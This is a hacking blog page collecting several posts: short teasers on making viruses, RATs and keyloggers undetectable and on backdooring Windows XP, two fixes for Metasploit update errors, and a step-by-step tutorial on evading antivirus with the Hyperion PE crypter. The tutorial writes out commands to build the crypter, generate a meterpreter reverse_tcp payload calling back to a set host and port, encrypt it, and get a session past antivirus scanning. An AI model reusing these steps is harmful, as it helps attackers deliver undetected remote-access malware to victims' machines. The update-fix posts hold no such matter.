How To Make your Viruses, Payloads, Rat, Key-logger, fully Undetectable From Anti-viruses

Hi To All The 

Requirements:-
1. Backtrack 5 or any Linux Distro Having msfencoders
2. your own virus/rat/keylogger engine mine is test1.exe
follow The commands shown in figure:-
 perform all steps having root permission
Note:- click on image to see a bigger image

if You Have Any Query Write in Below Comments...
We Will Try To Figure out 

Continue Reading

Backdoring by Adding Users To Windows Xp Using Windows/adduser payload with Metasploit in Backtrack

Continue Reading

Msfupdate not working with "no version information available" error by Shubham Mittal (@k@ Upgoingstaar)

A few days back while working with my testings and research, i came across an error which was continously depriving me of updating my metasploit framework. Error message was something like this :

(Click on Image to Enlarge)

No version available and blah blah blah. For that, i ignored it for a couple of days due to workload and downloaded exploits manually. But when it seemed kiddish to me, i got into roots. I soon realized that the "no version information available" error , here, meant that the library metasploit does not have a version to refer and hence it is not updating to any further version. Was quite kiddish, but realistic too. So i checked its libraries :

(Click on Image to Enlarge)

libssl.so.0.9.8 do not have a link to /usr/lib/ where as the entire library actually relies on the same. So what we need to do is : 

Backup the library that is erroring msf.

Create a link between the library msf and /usr/lib/

Do this : 

(Click on Image to Enlarge)

Once you are done with all this stuff, go ahead and update your metasploit. You will get a smile on your face.

(Click on Image to Enlarge)

So this was how you dont need to put back your actions if you get any error anywhere, just like in case of msf. 

Enjoy hacking, enjoy exploitation. :)

Continue Reading

Bypassing Antivirus with PE Crypters by Shubham Mittal (@k@ Upgoingstaar)

Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf)

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip



















Uzip It.

unzip Hyperion-1.0.zip
























Change the directory, and compile it.

cd Hyperion-1.0.zip

wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe



Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe





Scan it. 
Once the payload is ready, we will scan it first (without crypting).

Lets Crypt it with Hyperion.

wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe

ls -l





Scan it.
No Detection






Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.

Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.






I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

Continue Reading

MSF not updating : Working Copy '.' Locked. Suggestion for SVN

Welcome Friends, I Am Posting A New Tutorial by Shubham Mittal(@k@ upgoingstaar) and his Blog(Must read) 
http://3ncrypt0r.blogspot.in/
So Get Ready To Be A G33k With Him. Enjoy Tutorial...


 Most of the time when we come across some new exploits in the market and expect them in our msf instance, your framework stucks at some point while updating and you have a reason for your dissappointment. You try with some Googling but it doesnt help you as most of the prople instead of answering, are fighting, arguing and posting lame things on those forums.

To solve this for newbies, I am therefore writing this article, hwoever if you enjoy digging the things on your own (which is the best practice to make you strong conceptually, learnt this one of highly experienced senior), this is not for you.

There can be lot of reasons for not being able to update msf. One of them i included in my last post, 

http://3ncrypt0r.blogspot.in/2012/08/msfupdate-not-working-solution.html

The other one i am including today.

generally when we do update we have to sit long back to back as the update stucks, it comes back with error which seems something like this when you run msfupdate.

svn : Working copy '.' locked
svn : run 'svn cleanup' to remove locks (type 'svn help cleanup' for details)

IMAGES ARE SMALL IN VIEW; CLICK THEM FOR LARGER VIEW.

Reason: SVN not being able to handle the situation. 

What is SVN? 

SVN is a program which keeps track of all the different versions of our source files. You can give a read to it on this Wiki page.

Solution: 

It tries to resolve the issue on its own and suggest you to run "cleanup" at the directory which is getting locked. If it works, Congratulations". In most of the cases it will not work and you will see something like this:



In my case i was getting the error at "/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.8/lib/active_support" directory. 

I guessed it was getting locked at some file within the directory but as the files don't appear in the folder when it is bieng synchronized with git, so you can't delete that particular file. Better remove the directory itself. So i deleted my that particular directory:



I was a bit unlucky that day so it didnt solved the situation. But as we must leave the things unsolved go through the error and and try to figure it out. Again it was locked at some other directory : 



So without any laziness, delete it too.



As a precaution to avoid further error messages (I HATE ERRORS, seriously), so run this:

Most probably you have figured it out, so try msfupdate now.



And perhaps this will give you a smile.



Suggestions and queries are always welcomed.
KEEP EXPLOITING.

Continue Reading